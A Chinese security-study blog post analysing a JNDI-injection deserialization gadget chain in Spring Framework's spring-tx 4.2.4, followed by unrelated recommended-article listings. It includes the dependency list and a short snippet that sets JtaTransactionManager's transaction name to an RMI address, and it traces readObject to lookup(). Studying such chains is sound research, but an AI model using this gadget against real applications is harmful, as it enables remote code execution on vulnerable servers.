[Java安全]Java反序列化之spring-tx(Spring Framework 4.2.4)

最新推荐文章于 2023-11-26 19:15:36 发布
最新推荐文章于 2023-11-26 19:15:36 发布
阅读量517 收藏
点赞数 1
分类专栏: 安全学习 # Java代码审计 文章标签: spring java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/solitudi/article/details/120730520
版权

文章目录

环境

来自spring-jndi

依赖

<dependencies>
    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-tx</artifactId>
      <version>4.2.4.RELEASE</version>
    </dependency>
    <dependency>
      <groupId>org.springframework</groupId>
      <artifactId>spring-context</artifactId>
      <version>4.2.4.RELEASE</version>
    </dependency>
    <dependency>
      <groupId>javax.transaction</groupId>
      <artifactId>javax.transaction-api</artifactId>
      <version>1.2</version>
    </dependency>
  </dependencies>

分析

利用链构造

String jndiAddress = "rmi://127.0.0.1:1099/Object";
org.springframework.transaction.jta.JtaTransactionManager object = new org.springframework.transaction.jta.JtaTransactionManager();
object.setUserTransactionName(jndiAddress);

利用链分析

整个利用链是比较简单的,入口点在JtaTransactionManagerreadObject方法,
在这里插入图片描述

不为Null长度也大于0
在这里插入图片描述

这个lookup()函数符合JNDI注入的特征
在这里插入图片描述
继续跟入
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

InitialContext
在这里插入图片描述
最后回调实现了JNDI注入
在这里插入图片描述

Y4tacker
关注
专栏目录
Spring
charon2048的博客
11-08 277
Spring 第1章 Spring 概述 1.1 Spring 框架是什么 spring全家桶:spring, springmvc, spring boot,spring cloud spring:用来减小企业级开发的难度。方便项目模块之间的管理、类与类之间的管理,帮助开发人员创建对象,管理对象之间的关系。通过配置来实现。 spring核心是IOC(控制反转) AOP(面向切面编程)。模块之间 、类之间 的解耦合。关系松散一些。 注意点:maven是管理资源jar包。spring是管理项目内部模块和类之间
MyBatis入门
Princess_Y
11-25 1416
文章目录第1章 MyBatis简介1.1 MyBatis历史1.2 MyBatis简介1.3 如何下载MyBatis1.4 为什么要使用MyBatis – 现有持久化技术的对比第2章 HelloWorld2.1 开发环境的准备2.2 创建数据库和表2.3 创建Employee类2.4 创建EmployeeMapper(Dao)接口2.5 创建Mybatis的sql映射文件2.6 创建MyBatis的全局配置文件2.7 测试第3章 MyBatis全局配置文件3.1 MyBatis全局配置文件简介3.2 pro
spring-tx-4.2.4.RELEASE.zip
09-26
spring-framework.zip,弹簧AOP弹簧框架
Spring-TX
qq_40780198的博客
05-01 932
1.Spring-TX-传播行为 @Service public class UserService { @Autowired private UserDao userDao; /** * 转账 */ @Transactional(propagation = Propagation.REQUIRED) public void transfer(){ userDao.reduceMoney(); //..
Spring —— tx
最新发布
JL_L666的博客
11-26 110
概括:存放了事务具体的实现代码 - > 把它交给 - > spring-tx - > 根据它的实现进行事物操作。
spring-tx-4.0.2.RELEASE.jar
12-21
项目使用了spring-hibernate集成,但是报如下错的话: The project was not built since its build path is incomplete. Cannot find the class file for org.springframework.dao.support 这时有可能是还缺少一个spring-tx-RELEASE.jar包
SpringDataJPA详解
hhhghh_的博客
03-19 1037
概念 ORM思想 对象关系映射(Object Relational Mapping,简称ORM)是通过使用描述对象和数据库之间映射的元数据,将面向对象语言程序中的对象自动持久化到关系数据库中。 实际应用中即在关系型数据库和业务实体对象之间作一个映射,这样,我们在具体的操作业务对象的时候,就不需要再去和复杂的SQL语句打交道,只要像平时操作对象一样操作它就可以了。 简而言之,ORM思想就是通过实体对...
Spring 事务管理详解
你只管努力,
04-14 631
相信大家面试都经常会被问到框架相关的,或者有没有用过事务?那么看篇文章就对了。 1.什么是事务        所谓事务是用户定义的一个数据库操作序列,这些操作要么全做,要么全不做,是一个不可分割的工作单位。 说白了就是要么一起成功,要么一起失败。不存在一些成功一些失败。充分说明了事务的原子性。 2.事务的特性 原子性:要么全做,要么全不做。 一致性:说的是全
快速入门spring data jpa
weixin_43679491的博客
10-13 157
spring data jpa前言jpa坐标jpa核心配置文件实体类定义一个工具类使用注意jpql一、spring- spring jpa使用坐标spring配置文件dao接口使用延迟加载,立即加载注解jpql占位符多占位符接口方法名称规则定义条件查询语句二、多表操作多表操作 前言 jpa 坐标 <!-- hibernate对jpa的支持包 --> <dependency> <groupId>org.hibernate</groupId&
spring-tx-4.2.2.RELEASE.jar
09-10
The type org.springframework.dao.DataAccessException cannot be resolved. It is indirectly referenced from required .class files 解决方法: 导入spring-tx-4.2.2.RELEASE.jar包。
spring-tx-5.0.10.RELEASE-API文档-中文版.zip
05-01
赠送jar包:spring-tx-5.0.10.RELEASE.jar; 赠送原API文档:spring-tx-5.0.10.RELEASE-javadoc.jar; 赠送源代码:spring-tx-5.0.10.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-tx-5.0.10.RELEASE.pom; 包含翻译后的API文档:spring-tx-5.0.10.RELEASE-javadoc-API文档-中文(简体)版.zip; Maven坐标:org.springframework:spring-tx:5.0.10.RELEASE; 标签:springtxspringframework、jar包、java、中文文档; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。
spring-tx-5.0.8.RELEASE-API文档-中英对照版.zip
06-12
赠送jar包:spring-tx-5.0.8.RELEASE.jar; 赠送原API文档:spring-tx-5.0.8.RELEASE-javadoc.jar; 赠送源代码:spring-tx-5.0.8.RELEASE-sources.jar; 赠送Maven依赖信息文件:spring-tx-5.0.8.RELEASE.pom; 包含翻译后的API文档:spring-tx-5.0.8.RELEASE-javadoc-API文档-中文(简体)-英语-对照版.zip; Maven坐标:org.springframework:spring-tx:5.0.8.RELEASE; 标签:springframeworkspringtx、中英对照文档、jar包、java; 使用方法:解压翻译后的API文档,用浏览器打开“index.html”文件,即可纵览文档内容。 人性化翻译,文档中的代码和结构保持不变,注释和说明精准翻译,请放心使用。 双语对照,边学技术、边学英语。
spring-tx.jar
09-06
The type org.springframework.dao.DataAccessException cannot be resolved. It is indirectly referenced异常缺少的包
spring-framework-4.2.4包
07-15
Spring架包。ssm,springmvc.学习spring所需jar包,Spring是一个开放源代码的设计层面框架,他解决的是业务逻辑层和其他各层的松耦合问题,因此它将面向接口的编程思想贯穿整个系统应用。
SpringTX
wyy的博客
06-03 1179
[1]SpringTX的介绍 问题: 在学习了Spring整合mybatis后,我们可以直接从Spring容器中获取mapper层的实例化对象完成数据库操作。而在业务层方法中很多时候因为业务逻辑的复杂性,会出现在业务层方法中调用多个数据库操作。而之前我们学习过事务的管理,在同一个业务中只要有一个数据库操作执行失败,其他的就算执行成功也会一并回滚。但是在Spring整合Mybatis后,我们获取的直接是Mapper接口的实例化对象,而事务的管理需要使用connection对象来完成或者SqlSession对
Spring Tx(事务管理 注释版)
qq_44707265的博客
09-24 100
注解名 作用 @EnableTransactionManagement 开启注解事务管理 @Transactional 表示当前方法是一个事务方法 TxConfig package com.atguigu.tx; import com.mchange.v2.c3p0.ComboPooledDataSource; import org.springframework.bea...
Could not transfer artifact org.springframework:spring-tx:jar:3.2.3.RELEASE异常解决方案
12-03 9804
Could not transfer artifact org.springframework:spring-tx:jar:3.2.3.RELEASE异常解决方案 导致该异常的原因: 1.网速超级慢,慢到渣一样,下载断断续续的 2.你觉得慢,你自己手贱给中止掉了下载 异常后表现出来的现状: pom文件报错:内容大概就是xxxxxxx  jar包出问题之类的 解决方案: 第一步,到你自...
Spring-TX 事务
Alphamilk的博客
09-01 693
一、事务的种类 二、Spring事务管理器 三、事务注解使用 四、事务注解属性
Spring Framework 4.2.4.RELEASE 完整参考文档
Spring Framework 4.2.4.RELEASE 是一款广泛使用的开源框架,由多位知名开发者共同维护,如Rod Johnson、Juergen Hoeller等。此版本的文档详细介绍了Spring框架的核心概念和技术特性,旨在帮助开发者深入了解并熟练...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值